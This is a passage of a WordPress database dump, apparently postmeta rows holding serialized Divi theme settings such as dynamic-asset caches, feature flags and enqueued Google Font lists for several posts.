"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32046,1034,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32011,549,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32012,549,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32013,549,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32014,549,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32015,898,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32016,898,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32017,898,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32018,898,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32019,1678,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32020,1678,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32021,1678,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32022,1678,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32023,823,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32024,823,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32025,823,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32007,1114,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32008,1114,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32009,1114,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32010,1114,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32003,1684,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32004,1684,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32005,1684,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32006,1684,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31999,1047,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32000,1047,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32001,1047,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32002,1047,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31995,1158,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31996,1158,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31997,1158,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31998,1158,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31994,28,'_et_builder_module_features_cache','a:2:{i:0;s:52:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"tb\":[],\"wpe\":[]}\";i:1;a:19:{i:0;a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_b2f30ee030c5329f596841f0148f8671\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_00814485678686f36a8cfa556f28dd08\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_930fed4af0679dc3e81c4babefb4e1ff\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_69581f7437a889932c3b0400ba9694b6\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_f5bd13bb2395ea7fa553b88a263c1da5\";a:5:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_3a37fe7f5ab50b93914d842d59004d25\";a:5:{s:4:\"scef\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_82555b0dca46dcaab6c61455b64940f3\";a:5:{s:4:\"scef\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_d5b18640d0783b42b291f035138d2e98\";a:5:{s:4:\"scef\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_352a941cb5d1a192c08de0a39fcaf8e5\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_02368d74ad2c0b5e68d321c443e4ac98\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_1561a41cf9aee27606f7e135d874132f\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_f337fe848ed7ae7e3de443ab8f3b3e36\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_b65aae719f7164d2152a4d37d29ebf95\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_661390ed760e7d65552d7fad2c61901b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_0bbffb97eedfd206a631598a7a2a7c73\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_4494fef151854cb6f58571c3c543e9d2\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_button_6c4fe2766e0ab21ec417fb65cd3dc522\";a:7:{s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_de25f7f13df2da36f0237af20ddd13b3\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}}}'),(31991,28,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31992,28,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:1:{i:0;b:1;}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:6:{i:0;s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";i:1;s:18:\"gcid-primary-color\";i:2;s:20:\"gcid-secondary-color\";i:3;s:18:\"gcid-heading-color\";i:4;s:15:\"gcid-body-color\";i:5;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31993,28,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:3:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";i:2;s:111:\"Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31988,955,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18: